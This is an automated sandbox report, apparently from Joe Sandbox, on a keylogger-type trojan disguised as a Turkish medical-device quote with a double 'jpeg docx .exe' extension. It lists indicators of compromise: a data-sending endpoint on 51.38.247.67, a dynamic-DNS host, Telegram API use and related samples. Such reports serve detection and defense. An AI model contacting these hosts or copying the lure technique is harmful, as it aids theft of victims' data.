                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://checkip.dyndns.org/qfiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://chrome.google.com/webstore?hl=enfiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002F8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.ecosia.org/newtab/fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1340718168.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://varders.kozow.com:8081fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedfiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://reallyfreegeoip.org/xml/fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002F22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              149.154.167.220
                                                                              		api.telegram.orgUnited Kingdom
                                                                              		62041TELEGRAMRUfalse
                                                                              77.245.159.14
                                                                              		adendanismanlik.com.trTurkey
                                                                              		42868NIOBEBILISIMHIZMETLERITRtrue
                                                                              172.67.177.134
                                                                              		reallyfreegeoip.orgUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              132.226.247.73
                                                                              		checkip.dyndns.comUnited States
                                                                              		16989UTMEMUSfalse

                                                                              General Information

                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1572259
                                                                              Start date and time:2024-12-10 10:31:08 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 8m 29s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:12
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Siparii jpeg docx .exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@6/6@4/4
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:
                                                                              • Successful, ratio: 99%
                                                                              • Number of executed functions: 245
                                                                              • Number of non-executed functions: 11
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                              Warnings

                                                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 23.218.208.109, 172.202.163.200
                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                              • VT rate limit hit for: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              04:32:12API Interceptor6406941x Sleep call for process: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe modified
                                                                              04:32:15API Interceptor9x Sleep call for process: powershell.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              149.154.167.220KrnlSetup.exeGet hashmaliciousXWormBrowse
                                                                                SALARY_RECEIPT.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                    APQSKVTvd60SdAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      run.cmdGet hashmaliciousUnknownBrowse
                                                                                        https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comGet hashmaliciousHTMLPhisherBrowse
                                                                                          jXN37dkptv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            1mr7lpFIVI.exeGet hashmaliciousUnknownBrowse
                                                                                              eEiHdLSfum.exeGet hashmaliciousUnknownBrowse
                                                                                                eEiHdLSfum.exeGet hashmaliciousUnknownBrowse
                                                                                                  77.245.159.14fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    172.67.177.134document.pif.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      SALARY_RECEIPT.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        APQSKVTvd60SdAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            1733755327131807265395c8beb00b001ee74b7ae39a6579109a5e4a352d4399291272954e392.dat-decoded.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              jXN37dkptv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                Lenticels.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  UBS20240190101.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    Request for Quotation New collaboration.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                      INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        132.226.247.73document.pif.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        APQSKVTvd60SdAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        1733755327131807265395c8beb00b001ee74b7ae39a6579109a5e4a352d4399291272954e392.dat-decoded.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        Request for Quotation New collaboration.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        Payment Details Ref#577767.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        IBAN Payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        dekontu.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        pe61BNJmLf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • checkip.dyndns.org/
                                                                                                                        Halkbank_Ekstre_2024123_081142_787116.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • checkip.dyndns.org/

                                                                                                                        Domains

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        checkip.dyndns.comdocument.pif.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        Request for Quotation_10.12.2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 158.101.44.242
                                                                                                                        SALARY_RECEIPT.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 158.101.44.242
                                                                                                                        FATR98765678000.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 193.122.130.0
                                                                                                                        PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 158.101.44.242
                                                                                                                        APQSKVTvd60SdAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        rPurchaseOrder_PO19202409.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 158.101.44.242
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 193.122.6.168
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 132.226.8.169
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 158.101.44.242
                                                                                                                        api.telegram.orgKrnlSetup.exeGet hashmaliciousXWormBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        SALARY_RECEIPT.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        FATR98765678000.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        APQSKVTvd60SdAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        run.cmdGet hashmaliciousUnknownBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        jXN37dkptv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        1mr7lpFIVI.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        eEiHdLSfum.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        reallyfreegeoip.orgdocument.pif.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 172.67.177.134
                                                                                                                        Request for Quotation_10.12.2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 104.21.67.152
                                                                                                                        SALARY_RECEIPT.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 172.67.177.134
                                                                                                                        FATR98765678000.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 188.114.96.6
                                                                                                                        PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 104.21.67.152
                                                                                                                        APQSKVTvd60SdAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 172.67.177.134
                                                                                                                        rPurchaseOrder_PO19202409.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 104.21.67.152
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.67.152
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.67.152
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.67.152

                                                                                                                        ASNs

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        TELEGRAMRUKrnlSetup.exeGet hashmaliciousXWormBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        SALARY_RECEIPT.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        APQSKVTvd60SdAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        run.cmdGet hashmaliciousUnknownBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        jXN37dkptv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        1mr7lpFIVI.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        eEiHdLSfum.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        eEiHdLSfum.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        NIOBEBILISIMHIZMETLERITRfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 77.245.159.14
                                                                                                                        hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 77.245.159.27
                                                                                                                        https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAILGet hashmaliciousUnknownBrowse
                                                                                                                        • 77.245.159.9
                                                                                                                        PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 77.245.148.65
                                                                                                                        Contract_Agreement_Wednesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                                                                                                        • 77.245.159.9
                                                                                                                        Contract_Agreement_Tuesday September 2024.pdfGet hashmaliciousUnknownBrowse
                                                                                                                        • 77.245.159.9
                                                                                                                        https://bahrioglunakliyat.com.tr/wp-admin/admin-ajax.phpGet hashmaliciousUnknownBrowse
                                                                                                                        • 77.245.159.21
                                                                                                                        SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 77.245.159.7
                                                                                                                        file.exeGet hashmaliciousSystemBCBrowse
                                                                                                                        • 77.245.149.25
                                                                                                                        #U0130#U015eLEM #U00d6ZET#U0130_G5024057699-1034 nolu TICARI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 77.245.148.100
                                                                                                                        CLOUDFLARENETUSnanophanotool.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                        • 172.67.163.8
                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                        • 104.21.48.1
                                                                                                                        letter_sjoslin_odeonuk.com.pdfGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.17.55.22
                                                                                                                        Client-built.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                        • 162.159.135.234
                                                                                                                        KrnlSetup.exeGet hashmaliciousXWormBrowse
                                                                                                                        • 104.20.3.235
                                                                                                                        Client-built.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                        • 162.159.135.234
                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                        • 104.21.96.1
                                                                                                                        sjoslin@odeonuk.com_print.svgGet hashmaliciousUnknownBrowse
                                                                                                                        • 172.67.156.226
                                                                                                                        document.pif.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 172.67.177.134
                                                                                                                        sjoslin@odeonuk.com_print.svgGet hashmaliciousUnknownBrowse
                                                                                                                        • 172.67.156.226

                                                                                                                        JA3 Fingerprints

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        54328bd36c14bd82ddaa0c04b25ed9addocument.pif.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 172.67.177.134
                                                                                                                        Request for Quotation_10.12.2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 172.67.177.134
                                                                                                                        SALARY_RECEIPT.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 172.67.177.134
                                                                                                                        PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 172.67.177.134
                                                                                                                        APQSKVTvd60SdAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 172.67.177.134
                                                                                                                        rPurchaseOrder_PO19202409.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 172.67.177.134
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 172.67.177.134
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 172.67.177.134
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 172.67.177.134
                                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 172.67.177.134
                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eClient-built.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        KrnlSetup.exeGet hashmaliciousXWormBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        Client-built.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        c2.htaGet hashmaliciousXWormBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        iboka6.htaGet hashmaliciousUnknownBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        Statement 2024-11-29 (K07234).exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        SALARY_RECEIPT.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        aXxRRIGARH.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        aXxRRIGARH.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 149.154.167.220

                                                                                                                        Dropped Files

                                                                                                                        No context

                                                                                                                        Created / dropped Files

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.log

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1415
                                                                                                                        Entropy (8bit):5.352427679901606
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                                                                                        MD5:97AD91F1C1F572C945DA12233082171D
                                                                                                                        SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                                                                                        SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                                                                                        SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                                                                                        Malicious:true
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1172
                                                                                                                        Entropy (8bit):5.357042452875322
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:3CytZWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:yyjWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                                                                                        MD5:475D428E7231D005EEA5DB556DBED03F
                                                                                                                        SHA1:3D603ED4280E0017D1BEB124D68183F8283B5C22
                                                                                                                        SHA-256:1314488A930843A7E1A003F2E7C1D883DB44ADEC26AC1CA096FE8DC1B4B180F5
                                                                                                                        SHA-512:7181BDCE6DA8DA8AFD3A973BB2B0BA470468EFF32FFB338DB2662FEFA1A7848ACD87C319706B95401EA18DC873CA098DC722EA6F8B2FD04F1AABD2AEBEA97CF9
                                                                                                                        Malicious:false
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bwrh4fd.jcz.psm1

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Reputation:high, very likely benign file
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4znerlpu.mg3.psm1

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
